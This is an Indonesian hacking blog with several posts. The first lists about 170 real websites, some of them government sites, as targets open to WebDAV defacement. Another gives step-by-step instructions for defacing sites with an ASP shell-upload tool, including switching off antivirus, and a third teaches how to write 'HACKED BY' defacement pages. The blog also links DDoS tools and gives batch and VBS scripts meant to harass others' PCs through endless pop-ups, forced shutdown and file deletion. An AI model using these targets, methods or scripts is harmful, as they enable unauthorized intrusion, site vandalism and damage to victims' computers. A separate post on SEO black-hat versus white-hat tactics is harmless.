Website Webdav Vuln 2017

Mungkin sudah tak asing lagi dengan deface menggunakan webdav namun dork mungkin saja susah dicari ,, kali ini saya akan memposting sebuah website vuln untuk webdav , simak artikel saya kali ini ..
bagi pemula anda bisa lihat artikel saya tentang deface poc webdav
Klik Link dibawah ini :

Cara Deface menggunakan software webdav

http://hq.prospec.co.th/

http://branch.prospec.co.th/

http://tj.allbest.org/

http://www.rabachino.com/

http://www.bbba-grh.com/

http://gruppomediacom.com/

http://www.ratiss.org/

http://www.560560.ru/

http://www.50-50-50.ru/

http://office.ratiss.org/

http://560560.ru/

http://50-50-50.ru/

http://itsallgoodforyou.com/

http://tirupurjobs.net/

http://apparelworld.org/

http://cht.e-bestis.com.tw/

http://apbw.e-bestis.com.tw/

http://doacoes.fussesp.sp.gov.br/

http://www.6y555.com/

http://www.nuclear-experts.net/

http://www.anecra.pt/

http://209.60.104.53/

http://baza.ds.org.rs/

http://oulitnet.co.za/

http://liteoptec.co.za/

http://0739.gwytk.com/

http://hr.systematixshares.com/

http://leader.gwytk.com/

http://www.rabachino.com/

http://b2b.modelberg.it/

http://hengyue-media.com/

http://webphone.zayhi.com/

http://koiis.co.kr/

http://223.255.137.119/

http://sys.betafac.com/

http://gateway.net.co/

http://hq.prospec.co.th/

http://branch.prospec.co.th/

http://rso.gie-vso.fr/

http://112acil.com/

http://magazam.net/

http://happy.mikikk.co.jp/

http://ns1.112acil.com/

http://shop.magazam.net/

http://www.atakan.com.tr/

http://www.magazam.net/

http://ns1.atakan.com.tr/

http://ns1.magazam.net/

http://ns1.vfbayi.com/

http://ns1.evdeiste.com/

http://ptdel.com/

http://majmudars.com/

http://fmetiquetas.com/

http://lacre.pt/

http://www.anecra.pt/

http://saharamutual.com/

http://myownemailer.com/

http://sphinxillustrations.com/

http://www.sphinxanimations.com/

http://vzcx.idasoft.es/

http://213.96.91.26/

http://adr.soluzionimediacom.com/

http://asianapoli.soluzionimediacom.com/

http://call-center.gruppomediacom.it/

-http://callcenter.gruppomediacom.it/

http://gancia.soluzionimediacom.com/

http://gruppomediacom.com/

http://gruppomediacom.it/

http://hr.soluzionimediacom.com/

http://job.gruppomediacom.it/

http://www.correiodoc.correiodecarajas.com.br/

http://www.correiodecarajas.com.br/

http://www.enoticialagodetucurui.com/

http://hauntedreview.com/

http://branch.prospec.co.th/

http://gx.xiongsu.cn/

http://hq.prospec.co.th/

http://wop.zayhi.com/

http://www.tciil.co.in/

http://www.ldgb.net/

http://standards.co.kr/

http://koiis.co.kr/

http://xdoors.astor.it/

http://troop-1539.org/

http://familien-poulsen.dk/

http://orders.southeasternfood.com/

http://leader.gwytk.com/

http://0739.gwytk.com/

http://fmetiquetas.com/

http://oulitnet.co.za/

http://epssa.co.za/

http://loushifashion.com/

http://powerm.cn/

http://60.18.129.36/

http://cszhitu.com/

http://fxlnhly.com/

http://info.yeyadu.cn/

http://electronicculture.ru/

http://lnhuaxun.com/

http://web.yeyadu.cn/

http://www.yeyadu.cn/

http://westmillusa.com/

http://adtime.eugenio.com.br/

http://adtrafficweb.eugenio.com.br/

http://adtrafficweb.grupoeugenio.com.br/

http://offertelavoro.gruppomediacom.it/

http://recupero-crediti.gruppomediacom.it/

http://recuperocrediti.gruppomediacom.it/

http://ricerchedimercato.gruppomediacom.it/

http://www.calciomercatonapoli.info/

http://www.gruppomediacom.com/

http://www.maestrodascia.eu/

http://www.mediacom.biz/

http://maestrodascia.eu/

http://mediacom.biz/

http://tciglobal.com/

http://0731.zgxxk.net/

http://0745.gwytk.com/

http://bestilling.utdanningsdirektoratet.no/

http://www.ldgb.net/

http://www.zgxxk.net/

http://www.567888.pw/

http://www.danahias.at/

http://www.wsdscu.org/

http://bestilling.udir.no/

http://scm.icams.co.kr/

http://158.36.153.158/

http://tirupurjobs.net/

http://www.apparelworld.org/

http://www.tirupurjobs.net/

http://apparelworld.org/

http://gma2t.wlannet.net/

http://praso.wlannet.net/

http://smsget.zayhi.com/

http://tctnh.wlannet.net/

http://webphone.zayhi.com/

http://wop.zayhi.com/

http://isu.allbest.org/

http://iept.allbest.org/

http://cucbridals.com/

http://miracletouch.com.tw/

http://myteam4u.com/

http://imode.e-bestis.com.tw/

http://test.allbest.org/

http://211.23.248.40/

http://gx.xiongsu.cn/

http://cheeshin.com.tw/

http://admats.concerts.com/

http://my.smser.eu/

http://www.lawrenceting.com/

http://dike.dpt.go.th/

http://www.elcsfj.gov.cn/

http://documents.co.st-lucie.fl.us/

http://www.ybsds.gov.cn/

http://rsj.xxz.gov.cn/

http://www.xzll.gov.cn/

http://www.xmfg.gov.cn/

http://zzx.wlcbsgs.gov.cn/

http://www.librogondwana.com.ar/

http://www.ingacarrasco.com.ar/

http://www.salsadella.com.ar/

http://www.bgmgroup.cn/

http://ssc.rrp.kr/


unkin hanya itu saya yang ingin saya sampaikan selebihnya mohon dimaafkan :)
bila ada saran dan kritik PM fb saya :) Giovinca

Read More

Cara Deface Menggunakan Software Webdav

Assalamualaikum Wr.Wb

Sesuai dengan judul posting kali ini , saya akan memberikan tutorial deface website menggunakan Webdav buatan Hmei7 . Sebenarnya tutorial ini sudah banyak sekali di mbah google , namun karena saya hanya ingin berbagi kepada yang belum bisa alangkah baiknya saya menuliskan tutorial ini . Langsung saja kita ke tutorial deface website menggunakan software Webdav .

Pertama , kalian harus download dulu software webdavnya ,, cari di google banyak :v
Setelah selesai download kalian matikan dulu anti virus di komputer / laptop anda ( supaya software bisa dibuka ) selanjutnya tinggal kalian buka filenya .
Kalau sudah dibuka tinggal klik tulisan " Webdav " lalu klik " Asp shell maker "

Ini adalah penampakannya :v

Setelah itu Klik Load Shell From File ( masukan Script Deface Kalian ) 
Ubah Name Of Your Shellnya terserah kalian
Contoh : /nama.html

Seperti gambar diatas  :)
setelah itu masukan target sitenya klik add site ..
Masukan Target Utama di atas Klik link ini site vulnya banyak :v1000 Website Vuln 2017

SetelahJika Target udah di tambahkan kalian Klik Serang !
Kalau sukses maka akan tampilannya seperti ini :)
check sitenya dan Sukses :D
Mungkin itu saja yang share kali ini semoga sukses dan semoga berjumpa lagi :) 

Read More

Apa Itu White Hat & Black Hat ?

Apabila anda sudah pernah terjun di dunia Internet Marketing, anda pasti sudah pernah dengar istilah ‘black hat’ dan ‘white hat’ 

Apa itu?‘Black hat’
‘Black hat’ adalah teknik Internet Marketing yang digunakan untuk ‘menipu’ search engine seperti Google atau Yahoo supaya website anda tampil di halaman pencarian Utama.
Biasanya yang banyak di gunakan pemain black hat adalah mereka bikin website yang contentnya (isinya) hampir tidak ada apa-apa, tetapi di website tsb diisi dengan halaman yang penuh dengan iklan Adsense atau affiliate link mereka untuk menawarkan sebuah produk yang mereka pasarkan. Saya yakin anda pasti pernah temukan website2 seperti ini kan?
Website2 seperti ini tidak memberi nilai tambah (value) kepada pengunjung. Pemilik website hanya berharap ada yang klik iklan Adsense mereka atau beli affiliate produk yang mereka pasarkan. Dan biasanya juga, website2 seperti ini dibikin dengan software yang bisa membuat ratusan website dalam waktu yang cepat.
Pengunjung yang datang ke website2 seperti ini biasanya datang dari search engine seperti Google, Yahoo, dll. Namun black hat website biasanya hanya bertahan dalam waktu yang singkat (1 bulan – 4 bulan) di search engine.

Apa maksudnya bertahan di search engine? Bertahan di search engine maksudnya website anda ter-index.
Contoh: silakan anda ke http://google.com lalu ketik ’site:detik.com’ (tanpa kutip). Google akan meng-informasikan ke anda bahwa website detik.com ada sekitar 490,000 halaman yang terdaftar di Google. Wow! Banyak sekali ya.
Nah untuk sebuah website tampil di halaman pencarian Google (Google search results), website tsb harus terlebih dahulu terdaftar (indexed) di Google seperti contoh detik.com diatas.
Jadi apabila sebuah website http://namawebsite.com belum terdaftar di Google, maka website tsb tidak akan muncul di halaman pencarian Google.

Kembali lagi ke black hat. Website black hat tidak akan bertahan lama di Google. Seperti yang saya katakan diatas, pengalaman saya biasa mereka bertahan hanya 1 bulan – 4 bulan (ada juga kasus yang bertahan lebih lama dari itu, namun pengalaman saya mengatakan 4 bulan-an). Jadi setelah 4 bulan, website tsb tidak akan lagi muncul di halaman pencarian Google (situs tsb telah di de-indexed).
Para pemain black hat biasanya hanya mengandalkan search engine untuk mendatangkan pengunjung ke website black hat mereka. Artinya ketika website mereka di de-indexed, biasanya habis pula website tsb (artinya tidak ada pengunjung lagi).
Jadi ibaratnya pemain black hat selalu bermain kucing-kucing-an sama Google. Pemain black hat seperti tikus. Dan Google atau search engine lainnya seperti Kucing. Kucing makan tikus!
Nah sekarang kita bahas apa itu

‘White Hat’?
Website ’White Hat’ adalah website yang memberikan value kepada pengunjung. Contoh: detik.com, google.com, friendster.com, narutofan.com adalah website2 white hat. (Kebetulan saya fan nya Naruto, jadi saya sebutkan situs tsb sebagai contoh aja)
Kalau anda lihat, detik.com adalah situs yang memberikan berita terkini yang diupdate hampir setiap menit. Pengunjung ke situs ini mendapatkan manfaat dengan berita2 yang terbaru.
Google.com adalah sebuah search engine yang memberikan manfaat kepada orang2 yang ingin mencari sesuatu.
Friendster.com adalah situs untuk orang bergaul dengan teman2 mereka yang lama maupun dengan teman2 yang baru mereka kenal lewat friendster. Situs ini juga memberikan manfaat kepada mereka yang suka bergaul di Internet.
Narutofan.com adalah situs yang bermanfaat untuk para penggemar Naruto.
Membuat sebuah situs ’White Hat’ tidak akan di de-index oleh Google. Artinya website tsb akan selalu tampil di halaman pencarian Google.
Nah sekarang pertanyaannya adalah, kalau gitu saya pilih bikin website yang ’black hat’ atau ’white hat’ ya untuk mendapatkan duit lewat Internet?
Tabel di bawah ini akan menggambarkan positive dan negative pointnya masing2:
Black Hat
White Hat
1. Jangka pendek/short term (karena website akan di de-index oleh Google
1. Jangka panjang/long term (kemungkinan besar website akan terus ter-index oleh Google
2. Awalnya lebih cepat dan gampang dapat duit
2. Awalnya lebih lambat dan susah dapat duit
3. Jangka panjang tidak ada duit
3. Jangka panjang duit baru mulai masuk
4. Sebuah income stream
4. Sebuah bisnis

"Perhatikan point no. 4 diatas:
Black hat adalah sebuah income stream – artinya hanyalah bersifat sementara dan tidak bisa disebut sebagai sebuah bisnis (menurut saya).
White hat adalah sebuah bisnis – artinya bersifat long term dan bisa disebut sebagai sebuah bisnis.
Jadi semua tergantung kepada anda. Anda mau yang mana? Mau cape kerja sekarang tapi kedepannya enak ATAU mau sekarang dapet dulu, tapi kedepannya ga dapet sehingga anda harus mengulang siklus ini terus-terusan (bikin black hat website, terus di de-index, bikin lagi, di de-index lagi, dst)? Atau bisa juga anda melakukan dua-duanya.
Bagaimana menurut anda? Silakan berkomentar tentang topik ini…

                                                   

Read More

Script Deface Untuk Pemula *CTD* Team

Cara Mudah Membuat Script Deface - Script HTML 

Kali ini saya akan share tutorial yang mungkin "tidak diperlukan" lagi oleh para master deface. Namun meski tidak mainstream masih ada yang bertanya cara membuat Script HTML/ Script Deface. Oleh karena itu saya mencoba berbagi apa yang saya ketahui, membuat basic script HTML secara manual. Yang saya gunakan disini hanyalah Notepad. Download Tutorialnya Via Giovinca

Oke, sebelumnya perlu diketahui bahwa script HTML terdiri dari HEAD dan BODY. Head untuk menaruh judul dan meta tag sementara body diisi dengan notice/gambar deface.

Kira-kira susunannya seperti ini :

<HTML>

<head>

[kode HTML]

</head>

<body>

[Kode HTML]

</body>

</HTML>

Kita coba membuat title/judul halaman deface dan isi.

Perhatikan saja script sederhana berikut.

<HTML>

<head>

<title>Hacked By MR.V1NCH404</title>

</head>

<body>

Simple Script By Giovinca

</body>

</HTML>

Simpan dengan format .html . Sebagai contoh saya simpan dengan nama terserah.html . Coba buka menggunakan firefox/chrome sobat.Sip, langkah awal sudah berhasil.

Tahap kedua, kita coba untuk mengatur warna, besar huruf dan menengahkan huruf.

Simak saja scriptnya :

<HTML>

<head>

<title>HACKED BY MR.V1NCH404</title>

</head>

<body>

<center><FONT COLOR="red"><FONT SIZE=6>Simple Script By MR.V1NCH404</FONT></FONT></center>

</body>

</HTML>

Untuk font color bisa diganti dengan green, blue dll. Begitu juga dengan font size. Ini hasilnya :Tahap ketiga, kita coba memberi warna background pada script HTML.

Lihat script berikut :

<HTML>

<head>

<title> HACKED BY  </title>

</head>

<body BGCOLOR="black">

<center><FONT COLOR="red"><FONT SIZE=6> Simple Script By MR.V1NCH404 </FONT></FONT></center>

</body>

</HTML>

Tinggal menambahkan BGCOLOR di samping kode <body dan sebelum tanda tutup [>]

Save dan lihat hasilnya.

Tahap membuat script HTML bagi pemula sudah hampir selesai. Sekarang kita coba untuk menambah gambar pada script HTML kita.

Lihat script berikut :

<HTML>

<head>

<title> HACKED BY MR.V1NCH404 </title>

</head>

<body BGCOLOR="black">

<center><FONT COLOR="red"><FONT SIZE=6> Simple Script By MR.V1NCH404 </FONT></FONT></center>

<center><img src="https://scontent-sin6-2.xx.fbcdn.net/v/t1.0-9/20767728_397545347309340_9090651950721039330_n.jpg?oh=41f8369204e0d986e02db2b6444ff605&oe=5A221F30"

width="860" height="400""><center>

</body>

</HTML>

URL gambar yang saya beri warna biru bisa kalian ganti sendiri. Begitu juga dengan width dan height. Untuk gambarnya bisa cari di google atau upload di hosting upload gambar . Ex : google picasa, photobucket, dll.

Sekarang,kita coba tambahkan meta tag di komponen HEAD. Apa sih fungsi meta tag ?

Untuk member description dan keyword di hasil pencarian google. Mungkin kalau dijelaskan dengan kata-kata sulit :)

Kata yang saya beri tanda merah, itulah yang disebut META DESCRIPTION.

Lihat script berikut :

<HTML>

<head>

<title> HACKED BY AriefPrsty </title>

<meta name="description" content="Cyber Tron Darkness" />

</head>

<body BGCOLOR="black">

<center><FONT COLOR="red"><FONT SIZE=6> Simple Script By MR.V1NCH404 </FONT></FONT></center>

<center><img src="https://scontent-sin6-2.xx.fbcdn.net/v/t1.0-9/20767728_397545347309340_9090651950721039330_n.jpg?oh=41f8369204e0d986e02db2b6444ff605&oe=5A221F30"

width="860" height="400""><center>

</body>

</HTML>

Sebenarnya masih banyak meta tag seperti meta keyword, robots, title , dll. Namun karena ini adalah tahap perkenalan, pasang yang penting saja dulu. Yaitu meta description.

Selanjutnya, kita coba sedikit menghias script kita dengan tulisan berjalan [marquee] dan berkedip [blink].

Lihat saja kode berikut :

<HTML>

<head>

<title> HACKED BY MR.V1NCH404 </title>

<meta name="description" content="Cyber Tron Darkness Team" />

</head>

<body BGCOLOR="black">

<center><FONT COLOR="red"><FONT SIZE=6> <blink>Simple Script By MR.V1NCH404</blink></FONT></FONT></center>

<center><img src="https://scontent-sin6-2.xx.fbcdn.net/v/t1.0-9/20767728_397545347309340_9090651950721039330_n.jpg?oh=41f8369204e0d986e02db2b6444ff605&oe=5A221F30"

width="860" height="400""><center>

<center><FONT COLOR="red"><FONT SIZE=6> <marquee>Simple Script By MR.V1NCH404</marquee></</FONT></FONT></center>

</body>

</HTML>

Mungkin hanya itu yang dapat saya kembangkan di artikel kali ini , selebihnya mohon dimaafkan maklum saya cuma newbie yang ingin berinspirasi :( 

Demo : http://cheeshin.com.tw/CTD.team

Poc : Webdav

Read More

Beberapa tool hacking jail

Bebebrapa Tool Jahil Untuk Pemula

PERHATIAN !!Ini hanyalah untuk pembelajaran semata. Kemarin saya memposting script nya saja ,sekarang saya akan memposting artikel yang berisi file toolnya :)

Klik Disini! Jika ada kesalahan dalam penulisan atau ada unsur negative dalam blog saya inbox Giovinca

 ke Ayo langsung saja kita ke tool hacking nya ..
Download Saja Tool dibawah ini :
 Untuk mendownload anda harus mengisi CAPTCHA nya duluu :)

Ini ↓↓↓

 Tool Ddos

Tool Ddos 2

Tool Jail

Tool Notepad Jail

Tool Notepad Jail 2

Mungkin hanya itu yang dapat saya berikan segala kekurangan mohon dimaafkan karna saya juga sama seperti kalian hanya ingin belajar saja :)

~Selamat Mencoba :)

Read More

Script Hacking Sederhana Untuk Pemula

Oke kali ini saya akan mempoosting artikel script hacking sederhana menggunakan notepad ..

 

 PERHATIAN ..!
Saya hanya menyarankan agar script Notepad & Jail ini dicoba dulu sebelum menjahili teman , saya hanyalah manusia biasa jadi jika ada masalah atau kejadian yang tidak menyenangkan saya tidak bertanggung jawab atas semua itu :)

Jika ada kesalahan soal penulisan mohon dimaafkan atau inbox ke Giovinca

 Script Dibawah ini adalah script sederhana menggunakan notepad-CARA MEMBUAT PERINTAH NAKAL DENGAN NOTEPAD
 1. Buka Aplikasi Notepad terlebih dahulu
 2. Setelah dibuka Copy Script Dibawah ini
 cara membuat perintah nakal dengan notepad :

1. buka aplikasi notepad yang ada di dekstop maupun di start menu windows sobat
2. setelah sudah di buka sobat tinggal

Copy Dan Paste Script di bawah ini ..
 * Script Pesan yang Muncul Melulu
 Code:
 @ECHO off :
Begin
msg * Vinch Ganteng
msg * Lu jelek msg
msg* ko lu bingung?
msg * uda install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

*Script Shutdown dan Pesan
Code:

[i]@echo off
msg * Hacked By Cyber Tron Darkness shutdown -s -c "Error! muka mu standar abis"

NB: Dari ke dua Script di atas. save dengan ekstensi .bat contohnya. jail.bat *

 *Script Mainin CapsLock Button Sendiri

Code:
[i]Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys
{CAPSLOCK}" loop

perintah di atas save dengan ekstensi file .vbs contoh : capslock.vbs *

*Script Buka Tutup Cd / DVD Otomatis / Sendiri
[i]Code:

Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

 save perintah di atas dengan ekstensi .vbs contoh dvd.vbs

 * Script Buka Notepad Melulu / Otomatis

Code:
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top

save file di atas dengan ekstensi .bat contoh: notpad.bat
 *Script Otmotasi Buka Notepad lalu ngetik apa yang sobat mau

Code:

[i]WScript.Sleep 1800 WScript.Sleep 100 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 10 WshShell.AppActivate "Notepad" WScript.Sleep 50 WshShell.SendKeys "v" WScript.Sleep 50 WshShell.SendKeys "i " WScript.Sleep 50 WshShell.SendKeys "n" WScript.Sleep 50 WshShell.SendKeys "c" WScript.Sleep 50 WshShell.SendKeys "h " WScript.Sleep 50 WshShell.SendKeys "g" WScript.Sleep 50 WshShell.SendKeys "a" WScript.Sleep 50 WshShell.SendKeys "n" WScript.Sleep 50 WshShell.SendKeys " t" WScript.Sleep 50 WshShell.SendKeys "e" WScript.Sleep 50 WshShell.SendKeys " n" WScript.Sleep 50 WshShell.SendKeys "g" WScript.Sleep 50 WshShell.SendKeys "!!

" file di atas save dengan ekstensi .vbs contoh: ngetik.vbs

*Script QUIZ Notepad Jail

Code:
@echo off title quiz hari ini Smile :menu cls echo jika kamu diputusin pacar apa yang akan kamu lakukan? echo pilih yang mana: echo 1. Loncat dari gedung echo 2. Move on aja :V echo 3. kasih duid ke vinch :V set input=nothing set /p input=Choice: if %input%==1 shutdown -s -t 30 if %input%==2 del c:\xxx if %input%==3 @ECHO off msg * VINCH! msg * GANTENG msg * hayo lo,cpu lu gw acak2 msg * ud install ulang aja msg * biar masalah nya kelar @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top[/i]

 NB: echo 1 matiin komputer ( tersera sobat ganti tulisan apa ) echo 2 dan 3 juga ganti aja sesuai selere sobat semua.. untuk mengganti dir nya ganti aja sesuai selera sobat semua :)
 -----------------------------Cyber Tron Darkness----------------------- MR.V1NCH404

Read More